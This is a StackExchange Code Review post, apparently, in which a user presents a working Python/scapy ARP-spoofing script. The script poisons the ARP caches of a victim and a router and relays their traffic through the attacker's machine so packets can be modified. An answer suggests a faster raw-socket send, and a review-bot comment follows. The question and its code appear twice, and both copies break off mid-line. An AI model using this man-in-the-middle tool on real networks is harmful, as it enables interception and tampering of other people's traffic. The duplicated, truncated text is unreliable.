Speeding up forwarding of Ethernet frames in Python ARP spoof
Problem
I've followed a few tutorials on ARP spoofing with Python/scapy. They all suggest activating the OS IP forwarding in Linux: `echo 1 > /proc/sys/net/ipv4/ip_forward`
This worked fine for me but has the disadvantage that I can't tamper with packets. Since I will need to demonstrate modifying a packet before sending it along I need to handle the forwarding myself. I came up with this:
```
from scapy.all import *
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from threading import Thread
import time
# Layer-3 / layer-2 addresses of the three hosts in the demonstration network.
victim_ip = "192.168.0.2"
victim_mac = "b0:34:95:ee:ee:b6"

router_ip = "192.168.0.1"
router_mac = "C0:3E:0F:29:4F:EC"

# attack_ip is not referenced by the code visible on this page.
attack_ip = "192.168.0.10"
attack_mac = "08:00:27:80:bd:26"

# Seconds slept between rounds of ARP replies in poison.run().
poison_timer = 0.1
def monitor_callback(pkt):
    """Relay one sniffed IP frame between the victim and the router.

    Passed to sniff() as the per-packet callback. Frames without an IP
    layer are ignored. A frame whose Ethernet source is victim_mac is
    re-addressed to router_mac; otherwise a frame whose IP destination is
    victim_ip is re-addressed to victim_mac. Anything else is not sent.

    NOTE(review): only the Ethernet header is rewritten here. Every relayed
    frame leaves with attack_mac as its layer-2 source, for both endpoints'
    traffic, which is the on-wire trait a network monitor can key on.
    """
    if IP not in pkt:
        return

    # Pick the next hop; the victim-source test takes precedence, as before.
    if pkt[Ether].src == victim_mac:
        next_hop_mac = router_mac
    elif pkt[IP].dst == victim_ip:
        next_hop_mac = victim_mac
    else:
        return

    pkt[Ether].dst = next_hop_mac
    pkt[Ether].src = attack_mac
    # fragment() returns a list of packets; sendp() accepts the list as-is.
    sendp(fragment(pkt), verbose=0)
class monitor_incoming(Thread):
    """Thread that runs the sniffer and hands each frame to monitor_callback."""

    def __init__(self):
        Thread.__init__(self)

    def run(self):
        """Capture frames matching the "ip" filter without storing them."""
        # store=0: frames are handed to the callback only, not kept in memory.
        sniff(filter="ip", prn=monitor_callback, store=0)
class poison(Thread):
    """Thread that re-sends two fixed ARP replies on a timer.

    The replies are unsolicited and repeat every poison_timer seconds. That
    steady cadence of is-at messages for the gateway address is the pattern
    ARP-monitoring tools and switch-side ARP inspection are built to flag.
    """

    def __init__(self):
        Thread.__init__(self)

    def run(self):
        """Build both ARP replies once, then send them in an endless loop."""
        # op=2 marks an ARP reply.
        # Tell the victim 'router_ip is at attack_mac'
        router_is_at = ARP(op=2, psrc=router_ip, pdst=victim_ip, hwdst=attack_mac)
        # Tell the router 'victim_ip is at attack_mac'
        victim_is_at = ARP(op=2, psrc=victim_ip, pdst=router_ip, hwdst=attack_mac)

        replies = (router_is_at, victim_is_at)
        while True:
            for reply in replies:
                send(reply, verbose=0)
            time.sleep(poison_timer)
if __name__ == '__main__':
monitor_incoming = monitor_incoming()
monit
echo 1 > /proc/sys/net/ipv4/ip_forward
This worked fine for me, but it has the disadvantage that I can't tamper with packets. Since I will need to demonstrate modifying a packet before sending it along, I need to handle the forwarding myself. I came up with this:
```
from scapy.all import *
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from threading import Thread
import time
# Layer-3 / layer-2 addresses of the three hosts in the demonstration network.
victim_ip = "192.168.0.2"
victim_mac = "b0:34:95:ee:ee:b6"

router_ip = "192.168.0.1"
router_mac = "C0:3E:0F:29:4F:EC"

# attack_ip is not referenced by the code visible on this page.
attack_ip = "192.168.0.10"
attack_mac = "08:00:27:80:bd:26"

# Seconds slept between rounds of ARP replies in poison.run().
poison_timer = 0.1
def monitor_callback(pkt):
    """Relay one sniffed IP frame between the victim and the router.

    Passed to sniff() as the per-packet callback. Frames without an IP
    layer are ignored. A frame whose Ethernet source is victim_mac is
    re-addressed to router_mac; otherwise a frame whose IP destination is
    victim_ip is re-addressed to victim_mac. Anything else is not sent.

    NOTE(review): only the Ethernet header is rewritten here. Every relayed
    frame leaves with attack_mac as its layer-2 source, for both endpoints'
    traffic, which is the on-wire trait a network monitor can key on.
    """
    if IP not in pkt:
        return

    # Pick the next hop; the victim-source test takes precedence, as before.
    if pkt[Ether].src == victim_mac:
        next_hop_mac = router_mac
    elif pkt[IP].dst == victim_ip:
        next_hop_mac = victim_mac
    else:
        return

    pkt[Ether].dst = next_hop_mac
    pkt[Ether].src = attack_mac
    # fragment() returns a list of packets; sendp() accepts the list as-is.
    sendp(fragment(pkt), verbose=0)
class monitor_incoming(Thread):
    """Thread that runs the sniffer and hands each frame to monitor_callback."""

    def __init__(self):
        Thread.__init__(self)

    def run(self):
        """Capture frames matching the "ip" filter without storing them."""
        # store=0: frames are handed to the callback only, not kept in memory.
        sniff(filter="ip", prn=monitor_callback, store=0)
class poison(Thread):
    """Thread that re-sends two fixed ARP replies on a timer.

    The replies are unsolicited and repeat every poison_timer seconds. That
    steady cadence of is-at messages for the gateway address is the pattern
    ARP-monitoring tools and switch-side ARP inspection are built to flag.
    """

    def __init__(self):
        Thread.__init__(self)

    def run(self):
        """Build both ARP replies once, then send them in an endless loop."""
        # op=2 marks an ARP reply.
        # Tell the victim 'router_ip is at attack_mac'
        router_is_at = ARP(op=2, psrc=router_ip, pdst=victim_ip, hwdst=attack_mac)
        # Tell the router 'victim_ip is at attack_mac'
        victim_is_at = ARP(op=2, psrc=victim_ip, pdst=router_ip, hwdst=attack_mac)

        replies = (router_is_at, victim_is_at)
        while True:
            for reply in replies:
                send(reply, verbose=0)
            time.sleep(poison_timer)
if __name__ == '__main__':
monitor_incoming = monitor_incoming()
monit
Solution
I had the same problem. You need to set up a reusable `scapy.L2socket` socket and call `send(pkt)` on it, instead of using `sendp`.
It is much faster. Here you can see how to do it:
https://home.regit.org/2014/04/speeding-up-scapy-packets-sending/
The diff/change from using a normal sendp looks like this:
`scapy.L2socket` socket and call `send(pkt)` on it, instead of using `sendp`. It is much faster. Here you can see how to do it:
https://home.regit.org/2014/04/speeding-up-scapy-packets-sending/
The diff/change from using a normal sendp looks like this:
@@ -27,6 +27,7 @@ class replay:
def run(self):
# open filename
filedesc = open(self.filename, 'r')
+ s = conf.L2socket(iface=self.iface)
# loop on read line
for line in filedesc:
# Build and send packet
- sendp(pkt, iface = self.iface, verbose = verbose)
+ s.send(pkt)
Code Snippets
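Review bot: The socket created by the added `s = conf.L2socket(iface=self.iface)` line is never closed in this hunk, and neither is `filedesc`; `run()` continues outside the hunk, so this may be handled further down, but as shown both descriptors stay open until the process exits. Wrapping the loop as `try: ... finally: s.close()` keeps the raw socket's lifetime explicit. Replacing `sendp(..., verbose = verbose)` with `s.send(pkt)` also drops the `verbose` setting, so any per-packet output callers relied on disappears. The prose above names `scapy.L2socket` while the hunk uses `conf.L2socket`; the hunk's spelling is the one the linked change demonstrates. The same points apply to the repeated copy of this hunk further down the page.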
@@ -27,6 +27,7 @@ class replay:
def run(self):
# open filename
filedesc = open(self.filename, 'r')
+ s = conf.L2socket(iface=self.iface)
# loop on read line
for line in filedesc:
# Build and send packet
- sendp(pkt, iface = self.iface, verbose = verbose)
+ s.send(pkt)
Context
StackExchange Code Review Q#68016, answer score: 3